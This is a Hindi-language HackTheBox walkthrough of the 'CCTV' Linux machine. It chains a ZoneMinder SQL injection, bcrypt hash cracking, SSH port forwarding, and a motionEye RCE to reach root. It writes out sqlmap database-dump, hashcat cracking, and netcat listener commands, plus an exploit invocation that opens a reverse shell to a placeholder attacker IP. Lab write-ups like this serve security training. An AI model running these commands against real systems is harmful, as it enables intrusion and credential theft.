
HackTheBox CCTV walkthrough जिसमें CVE-2024-51482 ZoneMinder SQL injection, bcrypt hash cracking, और CVE-2025-60787 motionEye RCE को chain करके root प्राप्त किया जाता है।
प्लेटफ़ॉर्म: HackTheBox | OS: Linux
CVE-2024-51482 के माध्यम से ZoneMinder SQL इंजेक्शन डेटाबेस से एक bcrypt हैश निकालता है। hashcat से इसे क्रैक करने पर SSH एक्सेस मिलता है। पोर्ट फ़ॉरवर्डिंग के ज़रिए एक्सपोज़ किया गया आंतरिक motionEye इंस्टेंस CVE-2025-60787 के प्रति असुरक्षित है — जो रूट शेल देता है।
nmap -sV -sC 10.129.53.160 -Pn
22/tcp open ssh OpenSSH 9.6p1 (Ubuntu)
80/tcp open http Apache 2.4.58 — SecureVision CCTV & Security Solutions
/etc/hosts में cctv.htb जोड़ा गया। पोर्ट 80 पर एक ZoneMinder इंस्टॉलेशन होस्ट था।
CVE-2024-51482, ZoneMinder के लॉगिन एंडपॉइंट में एक SQL इंजेक्शन भेद्यता है। username पैरामीटर सैनिटाइज़ नहीं किया गया है, जिससे डेटाबेस एक्सट्रैक्शन संभव हो जाता है।
sqlmap -u "http://cctv.htb/zm/index.php" \
--data="username=admin&password=admin&action=login" \
--dbms=mysql --dump --batch
users टेबल से एक bcrypt पासवर्ड हैश निकाला गया।
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
पासवर्ड क्रैक हो गया।
ssh <user>@10.129.53.160
यूज़र फ़्लैग प्राप्त किया गया। आंतरिक सेवाओं की जाँच की गई।
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel
पोर्ट फ़ॉरवर्ड किया गया।
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160
CVE-2025-60787, motionEye में एक ऑथेंटिकेटेड RCE है। आंतरिक पैनल तक पहुँच के साथ, मनमाने कमांड root के रूप में निष्पादित होते हैं।
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444
रूट शेल प्राप्त किया गया। रूट फ़्लैग /root/root.txt पर है।
केवल शैक्षिक उद्देश्यों के लिए। केवल उन्हीं सिस्टमों का परीक्षण करें जिनके आप मालिक हैं या जिनका परीक्षण करने की आपके पास स्पष्ट अनुमति है।